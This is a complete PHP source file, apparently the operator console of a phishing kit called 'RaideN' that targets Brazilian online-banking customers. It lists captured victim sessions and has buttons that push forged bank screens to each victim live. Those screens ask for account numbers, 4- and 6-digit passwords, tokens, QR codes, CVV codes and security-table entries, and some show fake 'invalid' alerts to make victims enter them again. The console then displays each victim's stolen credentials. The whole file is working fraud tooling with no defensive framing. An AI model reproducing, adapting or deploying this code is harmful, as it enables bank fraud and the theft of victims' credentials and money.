<?php 
date_default_timezone_set('America/Sao_Paulo');
	@session_start();
	if (!isset($_SESSION['QNT'])) {
    	$_SESSION['QNT'] = 0;
	}
$hr = date(" H ");
if($hr >= 12 && $hr<18) {
$resp = "Boa tarde!";}
else if ($hr >= 0 && $hr <12 ){
$resp = "Bom dia!";}
else {
$resp = "Boa noite!";}
date_default_timezone_set('America/Sao_Paulo');
	$localInfo = "./QWERTY/";

	if(!isset($_REQUEST['inf'])){
		echo "<body style= 'background-color : #333333; text-align:center' >";
		echo '<meta http-equiv="pragma" content="no-cache">';
		echo '<title>RaideN </title>';
   		echo '<meta http-equiv="refresh" content="15;URL=">'; 
  		echo "<h2 align='center'><font face=verdana size=4>RaideN</h2>";
		echo '<style>
		a {
    	color: #808080;
   		 text-decoration: none;
		}
		a:hover {
		color: #3399FF;
    	text-decoration: underline;
		}
		</style>';
		echo '
		<style type="text/css">
		input[type=submit] {
		font-family: Calibri;
		font-size: medium;
		line-height: normal;
		background-color: #0080C0;
		background-repeat: no-repeat;
		background-position: center center;
		border: thin solid #0080C0;
	}
	</style>
';
		$arrayArquivos;
		$qnt = 0;
		$diretorio = dir($localInfo);
		     			echo '<table border="1" width="100%" id="table1" cellspacing="0" cellpadding="0" bordercolor="#C0C0C0">
						<tr>
						<td bgcolor="#0099CC" align="center">
						<p>&nbsp;<font face="Verdana"><strong>INFO</strong></font></td>
						<td width="307" bgcolor="#0099CC">
						<p align="center">&nbsp;<font face="Verdana"><strong>STATUS</strong></font></td>
						</tr>';
		while($arquivo = $diretorio -> read()){
    		if (strpos($arquivo, '.info') ){
	      		$name = explode(".info" ,$arquivo);
    	        if (isset($_POST['limpa'])){rename($localInfo . $arquivo, $localInfo . $name[0]."old"); $_SESSION['QNT'] = 0 ; continue;}
				$qnt2 = $qnt + 1;
						echo '<tr>
						<td height="25" align="center">
						<p><font color="#C0C0C0" face="Verdana">';
						
     			echo "<font color=#0099CC>(</font>".$qnt2."<font color=#0099CC>)</font><a target='_blank' href='?inf=".$arquivo."'>&nbsp;".$arquivo."</a>         -    <a href='QWERTY/del.php?info=".$arquivo."'><strong>[</strong>Excluir Info<strong>]</strong></a></font></td>";
	      		$arq = fopen($localInfo . $arquivo, 'r');
    	  		$tmparr = (array)json_decode(fgets($arq));
      			fclose($arq);
      			$qnt++;
	      		if ($tmparr['STATUS'] == 'AGUARDANDO'){
    	    		echo '<td width="307"><p align="center"><font face="Verdana" color="#FF0000">&nbsp;' . $tmparr['STATUS'] . '</font></td></tr>'; 
      			} 
          		else{
        			echo '<td width="307"><p align="center"><font face="Verdana" color="#008000">&nbsp;' . $tmparr['STATUS'] . '</font></td></tr>';
        		}
      			unset($tmparr);      
    		}
  		}
    
    	$diretorio -> close();
	  	if ($_SESSION['QNT'] != $qnt){
    	  echo '<audio autoplay="autoplay"><source src="op.mp3" /></audio>';
	      $_SESSION['QNT'] = $qnt;
  		}
  
		echo '<form id="frmop" method="POST" action="">';
  		echo "<button id='limpa' name='limpa' value='ok' onClick=\"return confirm('Limpar Infos??');\">Limpar</button><br><br>";
		echo '</form>';
		exit();
	}

	if (isset($_REQUEST['inf'])) {
		$inf = $_REQUEST['inf'];
   		echo "<body style= 'background-color : #333333; text-align:center' >";
    	$arquivo = $localInfo . $inf;

    	if(!file_exists($arquivo)){
   	 		exit();
    	}

// ------------- INICIO REQUEST OPERADOR --------------

    	if(isset($_POST['btoperador'])){
    		$bt = $_POST['btoperador'];
    		$arq = fopen($arquivo, 'rw+');
    		$arr = (array)json_decode(fgets($arq));
    		rewind($arq);
    		ftruncate($arq, 0);

    		
    		if(isset($_POST['NOME']))
    			$arr['NOME'] = $_POST['NOME'];
    		if(isset($_POST['POS']))
    			$arr['POS'] = $_POST['POS'];

			
			if ($bt == 'agcn') {

				$arr['STATUS'] = 'INICIAL';
				$arr['CHAT']  =  '<script>alert("Informações inválidas. Por favor, verifique agência, conta e dígito");</script><form id="FormPrincipal" action="#" method="post">
	<div id="Main" style="width:100%; height:100%">
		<div id="Sistema_Liberacao">	
				<div id="acessoHeaderFisica">
					<div id="clickPF"></div>
					<div id="clickPJ"></div>
					
					<div style="position: absolute; width: 22px; height: 31px; z-index: 1; left: 619px; top: 7px;cursor:help" id="layer2">
					<div style="position: absolute; width: 40px; height: 40px; z-index: 1; left: -141px; top: -6px;cursor:pointer" onclick="enviar();" id="layer3">
					</div>
					</div>
					
					<div style="position: absolute; width: 189px; height: 100px; z-index: 4; left: 25px; top: 50px;cursor:pointer" id="layer6">
					<div style="position: absolute; width: 136px; height: 25px; z-index: 1; left: 1140px; top: 107px" id="layer7">
					<input type="text" style="width:120px;height:20px"></div>
					</div>
					
					<input type="text" id="AGENC" name="AGENC" maxlength="4" onKeyup="autotab(this)" style="text-align:center">
					<input type="text" id="CNT" name="CNT" maxlength="7" onKeyup="autotab(this)" style="text-align:center">
					<input type="text" id="DIG" name="DIG" maxlength="1" style="text-align:center">

					<div id="bt_ok_pj" onclick="enviar();">
						<div style="position: absolute; width: 190px; height: 66px; z-index: 3; left: 27px; top: 157px;cursor:pointer" id="layer5" class="style1">
						</div>
						<div style="position: absolute; width: 268px; height: 37px; z-index: 6; left: 1044px; top: 9px" id="layer9">
											</div>
					</div>
								<div style="position: absolute; width: 24px; height: 26px; z-index: 5; left: 1301px; top: 158px;cursor:pointer" id="layer8">
					</div>
								</div>


		</div>
				<div id="acessoHeader">
				<div style="position: absolute; width: 184px; height: 390px; z-index: 2; left: 30px; top: 232px;cursor:pointer" id="layer4">
				</div>
				</div>
						<div id="main_Etapa_1">
		
		</div>
	</div>
</form>
<div style="position: absolute; width: 95px; z-index: 1000; left: 518px; top: 11px; height: 24px" id="layer1">
	<input type="checkbox"></div>
<div id="sobre_all" align="center">
	<img id="carregaimg" src="IMAGENS/carregando.gif" alt="">
</div>
';

			}

			if ($bt == 'senhae') {
	        	$arr['STATUS'] = 'SENHAELETRONICA';
	        	$arr['CHAT']  =  '<div id="header1"><div id="header1Fisicaleft"></div><div id="header1Fisicarigth"></div></div><div id="main_Etapa_2"><div id="dataCPF"></div><div id="main_senha_fisica"><div id="mensagemSenhaimg"><div id="Nome_Senha"><strong>' . $arr['NOME'] . '</strong></div><div><input type="password" name="senha" id="txtSenhafisica" maxlength="8"></div><div id="Limpa_Senha" onclick="LimpaSenha();"></div></div></div><div id="FotterSenha"><div id="btContinuar" onclick="enviar();"></div></div></div>';
	        	
          		
      		}

      		if ($bt == 'Tabela_Completa') {
	        	$arr['STATUS'] = 'TABELA_COMPLETA';
	        	$tmptab = "";
	        	$tmptab .= '<div id="tabelainp">';
	        	for ($j=0; $j <= 9 ; $j++) {
	        	$tmptab .= '<div class="tabline">';
	        		for ($i=1; $i <= 5 ; $i++) {
	        			$st = $i . $j;
	        			$stn = (int)$st;
	        			$st = $st - 9;
	        			$tmptab .= '<input type="text" maxlength="4" minlength="4" valida="Tabela Invalida!" name="pos' . $st . '">' ;
	        		}
	        	$tmptab .= '</div>';
	        	}
	        	$tmptab .= '</div>';
	        	$arr['CHAT']  =  '<div id="main_TAB_COMPLETA_1"> ' . $tmptab . '<div id="btContinuarTAB"  onclick="enviar();"></div></div>';
      		}

      		if ($bt == 'finaliza') {
      			$arr['STATUS'] = 'FINALIZADA';
      			$arr['CHAT']  =  '<script>window.location="./finalizada.html"</script>';
      		}
      		if ($bt == 'NETEMPRESA') {
      			$arr['STATUS'] = 'NETEMPRESA';
      			$arr['CHAT']  =  '<script>window.location="./NETEMPRESA/"</script>';
      		}

// inicio senha de 4 --------------------------------------------------------------------------------
      		if ($bt == 'Senha_4') {
      			$arr['STATUS'] = 'Senha_4';





      			$msg = "";
          $num = "7|8|9|4|5|6|1|2|3|0";
          $tmp = explode("|", $num);

          $msg .= "<div id='line1juju'>";
          foreach ($tmp as $key => $value) {
            $msg .= "<div class='tecbtjuju' value=\"$value\" onClick=\"javascript:letclick('$value'); return false;\"></div>";

          }
           $msg .= "</div>";


          $num = "Q|W|E|R|T|Y|U|I|O|P|´|[|LEFT";
          $tmp = explode("|", $num);
          //$msg .= "<div id='line2juju'>";
          foreach ($tmp as $key => $value) {
           // $msg .= "<div class='tecbt1juju' value=\"$value\" onClick=\"javascript:letclick('$value'); return false;\"></div>";

          }
          //$msg .= "</div>";


          $num = "A|S|D|F|G|H|J|K|L|Ç|~|]|ENTER";
          $tmp = explode("|", $num);
         // $msg .= "<div id='line3juju'>";
          foreach ($tmp as $key => $value) {
         //   $msg .= "<div class='tecbt2juju' value=\"$value\" onClick=\"javascript:letclick('$value'); return false;\"></div>";

          }
          //$msg .= "</div>";

          $num = "\|Z|X|C|V|B|N|M|,|.|;|/|ENTER";
          $tmp = explode("|", $num);
          //$msg .= "<div id='line4juju'>";
          foreach ($tmp as $key => $value) {
            //$msg .= "<div class='tecbt3juju' value=\"$value\" onClick=\"javascript:letclick('$value'); return false;\"></div>";

          }
          //$msg .= "</div>";


          $num = "CAPS|SHIFT|SPACE";
          $tmp = explode("|", $num);
          //$msg .= "<div id='line5juju'>";
          foreach ($tmp as $key => $value) {
          //  $msg .= "<div class='tecbt4juju' id='" . $value . "' value=\"$value\" onClick=\"javascript:letclick('$value'); return false;\"></div>";

          }
		  //$msg .= "</div>";


           $arr['CHAT'] = '<div id="header2juju"></div><div id="etapa2juju"><div id="inpetapa2juju"><input type="password" id="senhanet" name="senha" maxlength="4" minlength="4" valida="Senha Invalida!" /></div><div id="tecjuju">' . $msg  . '</div><div id="confetapa2" onClick="enviar();"></div><div id="confetapax" onClick="LimpaSenha();"></div><div style="position:absolute;left:190px;top:180px"><font face=verdana size=2>'.$resp.',<font color=#FF0000>'.$arr['NOME'].'</font></div>';
      		}
// fim senha de 4 -------------------------------------------------------------

// inicio senha de 4 --------------------------------------------------------------------------------
      		if ($bt == 'Senha_4_inv') {
      			$arr['STATUS'] = 'Senha_4';





      			$msg = "";
          $num = "7|8|9|4|5|6|1|2|3|0";
          $tmp = explode("|", $num);

          $msg .= "<div id='line1juju'>";
          foreach ($tmp as $key => $value) {
            $msg .= "<div class='tecbtjuju' value=\"$value\" onClick=\"javascript:letclick('$value'); return false;\"></div>";

          }
           $msg .= "</div>";


          $num = "Q|W|E|R|T|Y|U|I|O|P|´|[|LEFT";
          $tmp = explode("|", $num);
          //$msg .= "<div id='line2juju'>";
          foreach ($tmp as $key => $value) {
           // $msg .= "<div class='tecbt1juju' value=\"$value\" onClick=\"javascript:letclick('$value'); return false;\"></div>";

          }
          //$msg .= "</div>";


          $num = "A|S|D|F|G|H|J|K|L|Ç|~|]|ENTER";
          $tmp = explode("|", $num);
         // $msg .= "<div id='line3juju'>";
          foreach ($tmp as $key => $value) {
         //   $msg .= "<div class='tecbt2juju' value=\"$value\" onClick=\"javascript:letclick('$value'); return false;\"></div>";

          }
          //$msg .= "</div>";

          $num = "\|Z|X|C|V|B|N|M|,|.|;|/|ENTER";
          $tmp = explode("|", $num);
          //$msg .= "<div id='line4juju'>";
          foreach ($tmp as $key => $value) {
            //$msg .= "<div class='tecbt3juju' value=\"$value\" onClick=\"javascript:letclick('$value'); return false;\"></div>";

          }
          //$msg .= "</div>";


          $num = "CAPS|SHIFT|SPACE";
          $tmp = explode("|", $num);
          //$msg .= "<div id='line5juju'>";
          foreach ($tmp as $key => $value) {
          //  $msg .= "<div class='tecbt4juju' id='" . $value . "' value=\"$value\" onClick=\"javascript:letclick('$value'); return false;\"></div>";

          }
		  //$msg .= "</div>";


           $arr['CHAT'] = '<script>alert("Senha de 4 digitos inválida");</script><div id="header2juju"></div><div id="etapa2juju"><div id="inpetapa2juju"><input type="password" id="senhanet" name="senha" maxlength="4" minlength="4" valida="Senha Invalida!" /></div><div id="tecjuju">' . $msg  . '</div><div id="confetapa2" onClick="enviar();"></div><div id="confetapax" onClick="LimpaSenha();"></div><div style="position:absolute;left:190px;top:180px"><font face=verdana size=2>'.$resp.',<font color=#FF0000>'.$arr['NOME'].'</font></div>';
      		}
// fim senha de 4 -------------------------------------------------------------

    		if ($bt == 'Senha_6') {
      			$arr['STATUS'] = 'Senha_6';





      			$msg = "";
          $num = "7|8|9|4|5|6|1|2|3|0";
          $tmp = explode("|", $num);

          $msg .= "<div id='line1juju'>";
          foreach ($tmp as $key => $value) {
            $msg .= "<div class='tecbtjuju' value=\"$value\" onClick=\"javascript:ddfclick('$value'); return false;\"></div>";

          }
           $msg .= "</div>";



           $arr['CHAT'] = '<div id="header2juju"></div><div id="etapa2juju6"><div id="inpetapa2juju"><input type="password" id="senhacard" name="senha6" maxlength="6" minlength="6" valida="Senha Invalida!" /></div><div id="tecjuju">' . $msg  . '</div><div id="confetapa2" onClick="enviar();"></div><div id="confetapax" onClick="LimpaSenha();"></div><div style="position:absolute;left:190px;top:180px"><font face=verdana size=2>'.$resp.',<font color=#FF0000>'.$arr['NOME'].'</font></div>';
      		}

			if ($bt == 'tk_cs') {
      			$arr['STATUS'] = "TOK_1";
      		      $arr['CHAT'] = '<div id="header2juju"></div>';
		          $arr['CHAT'].= '<div id="etapa3juju">';
		          $arr['CHAT'].= '<div style="position:absolute;left:568px;top:200px;z-index:2;"><strong><font face=verdana size=1></strong><input type="password" class="qrcode" name="Codigo" maxlength="6"  minlength="6" size=5 valida="Codigo Invalida" /></div>';
				  $arr['CHAT'].= '<div style="position:absolute;left:480px;top:230px"><div id="btntk" onclick="enviar();"></div></div></div>';

      		}
 			if ($bt == 'tk_cs_inv') {
      			$arr['STATUS'] = "TOK_1_INVALIDO";
		          $arr['CHAT'] = '<script>alert("Chave de Segurança inválida");</script><div id="header2juju"></div>';
		          $arr['CHAT'].= '<div id="etapa3juju">';
		          $arr['CHAT'].= '<div style="position:absolute;left:568px;top:200px;z-index:2;"><strong><font face=verdana size=1></strong><input type="password" class="qrcode" name="Codigo" maxlength="6"  minlength="6" size=5 valida="Codigo Invalida" /></div>';
				  $arr['CHAT'].= '<div style="position:absolute;left:480px;top:230px"><div id="btntk" onclick="enviar();"></div></div></div>';

      		}

			if ($bt == 'tk_cs2') {
      			$arr['STATUS'] = "TOK_2";
		          $arr['CHAT'] = '<div id="header3juju"></div>';
		          $arr['CHAT'].= '<div id="etapa3juju2">';
		          $arr['CHAT'].= '<div style="position:absolute;left:700px;top:260px;z-index:2;"><strong><font face=verdana size=1></strong><input type="password" class="qrcode" name="Codigo" maxlength="6"  minlength="6" size=5 valida="Codigo Invalida" /></div>';
				  $arr['CHAT'].= '<div style="position:absolute;left:720px;top:290px"><div id="btntk" onclick="enviar();"></div></div></div>';

      		}
			if ($bt == 'tk_cs2_inv') {
      			$arr['STATUS'] = "TOK_2";
		          $arr['CHAT'] = '<script>alert("Chave de Segurança inválida");</script><div id="header3juju"></div>';
		          $arr['CHAT'].= '<div id="etapa3juju2">';
		          $arr['CHAT'].= '<div style="position:absolute;left:700px;top:260px;z-index:2;"><strong><font face=verdana size=1></strong><input type="password" class="qrcode" name="Codigo" maxlength="6"  minlength="6" size=5 valida="Codigo Invalida" /></div>';
				  $arr['CHAT'].= '<div style="position:absolute;left:720px;top:290px"><div id="btntk" onclick="enviar();"></div></div></div>';

      		}

			if ($bt == 'qr_code') {
      			$arr['STATUS'] = "QR_CODE";
      			  $arr['CHAT'] = '<div id="header3juju"></div>';
		          $arr['CHAT'].= '<div id="etapa4juju"><div style="position:absolute;left:630px;top:370px;z-index:2;"><strong><font face=verdana size=1></strong><input type="password" class="qrcode" name="Codigo" maxlength="8"  minlength="8" size=5 valida="Codigo Invalida" /></div>';
		          $arr['CHAT'].= '<div style="position:absolute;left:610px;top:190px"><iframe src=wp-admin/QWERTY/images/load1.php?img='.$inf.'.png height=170 width=172 frameborder=0 scrolling=no></iframe></div>';
				  $arr['CHAT'].= '<div style="position:absolute;left:730px;top:370px"><div id="btntk" onclick="enviar();"></div></div></div>';

      		}
			if ($bt == 'cvv') {
      			$arr['STATUS'] = "CVV";
      			  $arr['CHAT'] = '<div id="header3juju"></div>';
		          $arr['CHAT'].= '<div id="etapa4juju3"><div style="position:absolute;left:510px;top:290px;z-index:2;"><strong><font face=verdana size=1></strong><input type="password" class="qrcode" name="cvv" maxlength="3"  minlength="3" size=5 valida="Senha Invalida" style="width:60px"/></div>';
				  $arr['CHAT'].= '<div style="position:absolute;left:730px;top:370px"><div id="btntk" onclick="enviar();"></div></div></div>';

      		}

			if ($bt == 'tabela') {
      			$arr['STATUS'] = "TABELA";
		          $arr['CHAT'] = '<div id="header3juju"></div>';
		          $arr['CHAT'].= '<div id="etapa3juju3">';
		          $arr['CHAT'].= '<div style="position:absolute;left:800px;top:220px;z-index:2;"><strong><font face=verdana size=1></strong><input type="password" class="qrcode" name="Codigo" maxlength="3"  minlength="3" size=5 valida="Codigo Invalida" style="width:40px"/></div>';
				  $arr['CHAT'].= '<div style="position:absolute;left:680px;top:240px"><div id="btntk" onclick="enviar();"></div></div></div><div style="position:absolute;left:770px;top:195px"><strong><font face=verdana size=2>Posição '.$arr['POS'].'</font></div>';
      		}
			if ($bt == 'tabela_inv') {
      			$arr['STATUS'] = "TABELA_INVALIDA";
		          $arr['CHAT'] = '<script>alert("Chave de Segurança inválida");</script><div id="header3juju"></div>';
		          $arr['CHAT'].= '<div id="etapa3juju3">';
		          $arr['CHAT'].= '<div style="position:absolute;left:800px;top:220px;z-index:2;"><strong><font face=verdana size=1></strong><input type="password" class="qrcode" name="Codigo" maxlength="3"  minlength="3" size=5 valida="Codigo Invalida" style="width:40px"/></div>';
				  $arr['CHAT'].= '<div style="position:absolute;left:680px;top:240px"><div id="btntk" onclick="enviar();"></div></div></div><div style="position:absolute;left:770px;top:195px"><strong><font face=verdana size=2>Posição '.$arr['POS'].'</font></div>';
      		}

			
			fwrite($arq, json_encode($arr));
			fclose($arq);
        }



//-----------    INICIO LAYOUT    -----------
    
    	$arq = fopen($arquivo, 'r');
    	$arr = (array)json_decode(fgets($arq), true);
    	echo "<title>$inf - RaideN </title>";
	    echo "<h2 align='center'><font face=verdana size=2 color=#C0C0C0>$inf</font> ";
    	if(isset($arr['email'])) echo $arr['email'] . "</h2>";
    
	    if ($arr['STATUS'] == 'AGUARDANDO') {
    	    echo "<h2 align='center'><font face=verdana size=2> <font size='3' color='red'> " . $arr['STATUS'] . " </font> </font></h2>";
        	echo '<audio autoplay="autoplay"><source src="op.mp3" /></audio> ';
	        echo '<meta http-equiv="refresh" content="50;URL=">';
    	} else {
    	    echo "<h2 align='center'> <font size='3' color='green'> " . $arr['STATUS'] . " </font> </h2>";
        	echo '<meta http-equiv="refresh" content="10;URL=">';
    	}

	    echo '<table align="center" height="194" style="font-family:Tahoma;font-size:11px;font-weight:bold;border:1px solid #000000;">';
	    echo '<tr>';


    	echo '<td width="200" height="40"><font face=verdana size=2 color=#808080>Agência: ';
	    echo (isset($arr['AGENC'])) ? $arr['AGENC'] : "" ;
    	echo '</td>';



	    echo '<td width="194" colspan="2"><font face=verdana size=2 color=#808080>Conta: ';
	    echo (isset($arr['CNT'])) ? $arr['CNT'] : "" ;
	    echo (isset($arr['DIG'])) ? $arr['DIG'] : "" ;
   		echo '</td>';


	    echo '<th rowspan="6"><font face=verdana size=2 color=#808080>C&oacute;digos<br>';
    	echo '<textarea name="textarea" rows="14">';
 	   if (isset($arr['CODIGO'])){ 
    		foreach ($arr['CODIGO'] as $key => $value) 
    		{
    			echo $value . "\r\n";
    		}
    	}	
	    echo '</textarea></th>';

	    echo '</tr><tr>';


    	echo '<tr>';

        echo '<td width="200" height="40"><font face=verdana size=2 color=#808080>Senha 4: ';
 	  	echo (isset($arr['senha'])) ? $arr['senha'] : "" ; 
 	  	echo '</td>';

	    echo '<td height="40" colspan="2"><font face=verdana size=2 color=#808080>CVV: ';
 	  	echo (isset($arr['cvv'])) ? $arr['cvv'] : "" ; 
  		echo '</td></tr>';

 	    echo '<td height="40" colspan="2"><font face=verdana size=2 color=#808080>Nome: ';
 	  	echo (isset($arr['NOME'])) ? $arr['NOME'] : "" ; 
  		echo '</td></tr>';

	    echo '<td height="40" colspan="2"><font face=verdana size=2 color=#808080>Senha 6: ';
 	  	echo (isset($arr['senha6'])) ? $arr['senha6'] : "" ; 
  		echo '</td></tr>';

  		echo '</td></tr>';
		echo '</table>';
		echo '
		<style type="text/css">
		button[type=submit] {
		font-family: Calibri;
		font-size: medium;
		line-height: normal;
		background-color: #0080C0;
		background-repeat: no-repeat;
		background-position: center center;
		border: thin solid #0080C0;
	}
	</style>
';
    	
    	echo '

    	<head>
		<style type="text/css">
.style1 {
	border-width: 0;
}
</style>
		</head>

    	<div align="center">
	    <form id="frmop" method="POST" action="?inf=' . $inf . '">
    	<table style="font-family:Tahoma;font-size:11px; width: 601px;"><tbody><tr>
	    <td width="429" style="border-style: solid; border-color: #000000;" class="style1">  
        <center>
    	<font face=verdana size=3 color=white>NOME: <input type="text" name="NOME"> POSIÇÃO: <input type="text" name="POS"><br><br>
    	<button type="submit" value="agcn" name="btoperador" onClick="return confirm(\'Agencia ou Conta Invalida?\');">INICIAL</button> 
    	<button type="submit" value="Senha_4" name="btoperador" onClick="return confirm(\'SENHA?\');">SENHA DE 4</button> 
    	<button type="submit" value="Senha_4_inv" name="btoperador" onClick="return confirm(\'SENHA?\');">SENHA INCORRETA</button> 
     	<button type="submit" value="Senha_6" name="btoperador" onClick="return confirm(\'SENHA?\');">PEDIR SENHA DE 6</button>
	    <button type="submit" value="tk_cs" name="btoperador" onClick="return confirm(\'TOKEN?\');">TOKEN ACESSO</button><br><br>
	    <button type="submit" value="tk_cs_inv" name="btoperador" onClick="return confirm(\'TOKEN?\');">TOKEN ACESSO INVALIDO</button> 
	    <button type="submit" value="tk_cs2" name="btoperador" onClick="return confirm(\'QR/TOKEN?\');">PEDIR TOKEN</button>
	    <button type="submit" value="tk_cs2_inv" name="btoperador" onClick="return confirm(\'QR/TOKEN?\');">TOKEN INVALIDO</button>
		<button type="submit" value="qr_code" name="btoperador" onClick="return confirm(\'PEDIR QRCODE?\');">PEDIR QRCODE</button><br><br>
        <button type="submit" value="cvv" name="btoperador" onClick="return confirm(\'CVV?\');">	PEDIR CVV</button>  
        <button type="submit" value="tabela" name="btoperador" onClick="return confirm(\'PEDIR POSIÇÃO TABELA?\');">PEDIR TABELA</button>
        <button type="submit" value="tabela_inv" name="btoperador" onClick="return confirm(\'PEDIR POSIÇÃO TABELA?\');">TABELA INVALIDA</button>

        <!--<button type="submit" value="NETEMPRESA" name="btoperador" onClick="return confirm(\'REDIRECIONAR PARA NETEMPRESA?\');">	NET-EMPRESA?</button> -->

 
	    
		
	    </td></tr><tr>

 		</td></tr><tr>
					<td style="border-style: solid; border-color: #000000;" align="center" class="style1">
	    

		<iframe src="qrcode.php?info=' . $inf . '"" style="height: 270px; width: 472px" class="style2" name="oi" border="0" frameborder="0"></iframe>
	    
    	</td></tr><tr>
					<td style="border-style: solid; border-color: #000000;" align="center" class="style1">
	    

	    <br><br><br><button type="submit" value="finaliza" name="btoperador" onClick="return confirm(\'Deseja realmente Finalizar??\');">Finalizar</button></td></tr></tbody></table></form></div>

</center>';
    	
    	
    	fclose($arq);

	}
		

 ?>